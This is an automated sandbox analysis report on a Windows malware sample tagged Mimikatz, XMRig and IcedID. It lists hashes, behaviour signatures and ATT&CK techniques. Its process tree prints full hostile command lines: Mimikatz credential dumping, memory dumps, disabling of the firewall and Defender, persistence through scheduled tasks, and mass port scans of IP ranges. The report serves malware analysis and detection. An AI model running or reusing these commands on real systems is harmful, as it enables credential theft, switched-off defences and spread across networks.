Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
01-09-2024 11:47
General
-
Target
2024090153bc5ff9113f5c87da313d0a8f9e4e19hacktoolsicedidmimikatz.exe
-
Size
8.5MB
-
MD5
53bc5ff9113f5c87da313d0a8f9e4e19
-
SHA1
6a392a29f4421f6a65cedf99001fadb498514a3d
-
SHA256
e6759015a43186863e34019080740cf11a56f1683da6b71cb112b9b4e6b19a0a
-
SHA512
8d871c36cf5765ebc3c4e97093e142e5cd94a9c2d78d62a5788ae59269fc5f249de3f5ed60d55a6d24819a281d2fc11c61b245ba9c26fcc83041621c7ef95c81
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (19556) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 4 IoCs
-
Drops file in Drivers directory 3 IoCs
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Executes dropped EXE 28 IoCs
-
Loads dropped DLL 12 IoCs
-
UPX packed file 35 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
NSIS installer 3 IoCs
-
Modifies data under HKEY_USERS 45 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 24 IoCs
-
Suspicious use of SetWindowsHookEx 10 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\qzebsiybv\bnidgq.exe"C:\Windows\TEMP\qzebsiybv\bnidgq.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\2024090153bc5ff9113f5c87da313d0a8f9e4e19hacktoolsicedidmimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024090153bc5ff9113f5c87da313d0a8f9e4e19hacktoolsicedidmimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\znrgncrv\emzriir.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\znrgncrv\emzriir.exeC:\Windows\znrgncrv\emzriir.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\znrgncrv\emzriir.exeC:\Windows\znrgncrv\emzriir.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\kgkufnrnc\uhbggiaeb\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\kgkufnrnc\uhbggiaeb\wpcap.exeC:\Windows\kgkufnrnc\uhbggiaeb\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\kgkufnrnc\uhbggiaeb\nnbuyeerm.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\kgkufnrnc\uhbggiaeb\Scant.txt2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\kgkufnrnc\uhbggiaeb\nnbuyeerm.exeC:\Windows\kgkufnrnc\uhbggiaeb\nnbuyeerm.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\kgkufnrnc\uhbggiaeb\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\kgkufnrnc\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\kgkufnrnc\Corporate\log.txt2⤵
- Drops file in Windows directory
-
C:\Windows\kgkufnrnc\Corporate\vfshost.exeC:\Windows\kgkufnrnc\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bfgicktqy" /ru system /tr "cmd /c C:\Windows\ime\emzriir.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "bfgicktqy" /ru system /tr "cmd /c C:\Windows\ime\emzriir.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "knzrvbgag" /ru system /tr "cmd /c echo Y|cacls C:\Windows\znrgncrv\emzriir.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "knzrvbgag" /ru system /tr "cmd /c echo Y|cacls C:\Windows\znrgncrv\emzriir.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "vcpfgnbum" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\qzebsiybv\bnidgq.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "vcpfgnbum" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\qzebsiybv\bnidgq.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 776 C:\Windows\TEMP\kgkufnrnc\776.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 384 C:\Windows\TEMP\kgkufnrnc\384.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 1772 C:\Windows\TEMP\kgkufnrnc\1772.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 2616 C:\Windows\TEMP\kgkufnrnc\2616.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 2776 C:\Windows\TEMP\kgkufnrnc\2776.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 2848 C:\Windows\TEMP\kgkufnrnc\2848.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 2876 C:\Windows\TEMP\kgkufnrnc\2876.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 3792 C:\Windows\TEMP\kgkufnrnc\3792.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 3888 C:\Windows\TEMP\kgkufnrnc\3888.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 3952 C:\Windows\TEMP\kgkufnrnc\3952.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 4044 C:\Windows\TEMP\kgkufnrnc\4044.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 2492 C:\Windows\TEMP\kgkufnrnc\2492.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 4980 C:\Windows\TEMP\kgkufnrnc\4980.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 3500 C:\Windows\TEMP\kgkufnrnc\3500.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 4108 C:\Windows\TEMP\kgkufnrnc\4108.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 1440 C:\Windows\TEMP\kgkufnrnc\1440.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 544 C:\Windows\TEMP\kgkufnrnc\544.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exeC:\Windows\TEMP\kgkufnrnc\zhcbccpzr.exe -accepteula -mp 3096 C:\Windows\TEMP\kgkufnrnc\3096.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\kgkufnrnc\uhbggiaeb\scan.bat2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\kgkufnrnc\uhbggiaeb\bbqlvcqnq.exebbqlvcqnq.exe TCP 194.110.0.1 194.110.255.255 445 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\wooakm.exeC:\Windows\SysWOW64\wooakm.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\emzriir.exe1⤵
-
C:\Windows\ime\emzriir.exeC:\Windows\ime\emzriir.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\znrgncrv\emzriir.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\znrgncrv\emzriir.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\qzebsiybv\bnidgq.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\qzebsiybv\bnidgq.exe /p everyone:F2⤵
-
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Discovery
Network Service Discovery
2Network Share Discovery
1Query Registry
1Remote System Discovery
1System Information Discovery
1System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
4.1MB
MD53c360941cc9f283cdadeaa52b6e25533
SHA1cf8fed69dff9a27835e69ed75e57fb0d18bce640
SHA2561919de6868c31cf489a41520443b116ca4770e5cdeec23d4b3bde019c81df168
SHA5127f16a5c5cea59fd66f1f4d75e93c7fd3f20fdc040603fdef9a48ef4cfc1f65a91a65ac58734491d26ff4db22213224cf7aa7caf672e2dfe579b35d6f74b226b1
-
Filesize
26.0MB
MD515297e10b9c6521ca51706a50aa7ac81
SHA1065f82b813a20fb7346c644876bc111ddadceade
SHA25673e79fcdf61a4fe13d9311e76eecce1429499328a24c45faa4c79e8cfbc033da
SHA5127cd0242df9197b5e48148ff7b7a48c907b7fde74e7d380af0f320108db0d0a0e2539d118b333e1948c55038a359a75c9da31eca7df2be36173d0ff2f74041bdd
-
Filesize
3.9MB
MD560ac582365bfabfe1bc252824afd07eb
SHA15be8263c7db6554471ad0800249798c8fa139f02
SHA256e65f027dff64245d447512b88f636064b5d3941d2047cab66260e09870d21a24
SHA512baf34702a37c89d5b0b349ec0ec90fa46b8aa7a4e6dec33e9432f84f081f4893d52c15f0541e63826654d9bc1132bb794fb7a8efda03e37dd58bf063168ce40a
-
Filesize
2.9MB
MD59e27591dc31a40b049fe0a4603caa820
SHA1f1611bbf5f865989598f77ff67a678bbf78adcd8
SHA2564384f8a0afb4f9babb0c79e757e02a82cae27b704f876dd623d2efd0aa6795bf
SHA5124e55f4da374f3fe3f7bda4d80bc6d9ae39f717e3f1a8b815b25ec670e6e31081e39486bf45b904f7bd7d1372c772e39f1053ac00e4f14c99e32e2707f4b450e4
-
Filesize
7.6MB
MD56126cbb63c0226d1c6b820bf734ccc71
SHA11050208a2478d6912fd2899380802c776315fffd
SHA256b0c22e78738aa3030aa2d519deb32b4de0817fe53043ad442eb5bc77f2e4e3d5
SHA512b2218c51003f3bdb35e2ba7ba6a030612522c03f84c0cc36d5638d6c0e59298c0c87a82d262b427bab97d74c5563d2ab833a466811d391bdf64ba98047ba7fd6
-
Filesize
788KB
MD56ed46d4dcd35c560e8c939d3be5008a2
SHA1a0ce749ae2f72acc30783ed2b1c89bdb1b57f7ef
SHA256c951fdd5f0f4b94451d64594f003344f2258c78163eaaec1f413b4ced862d2f5
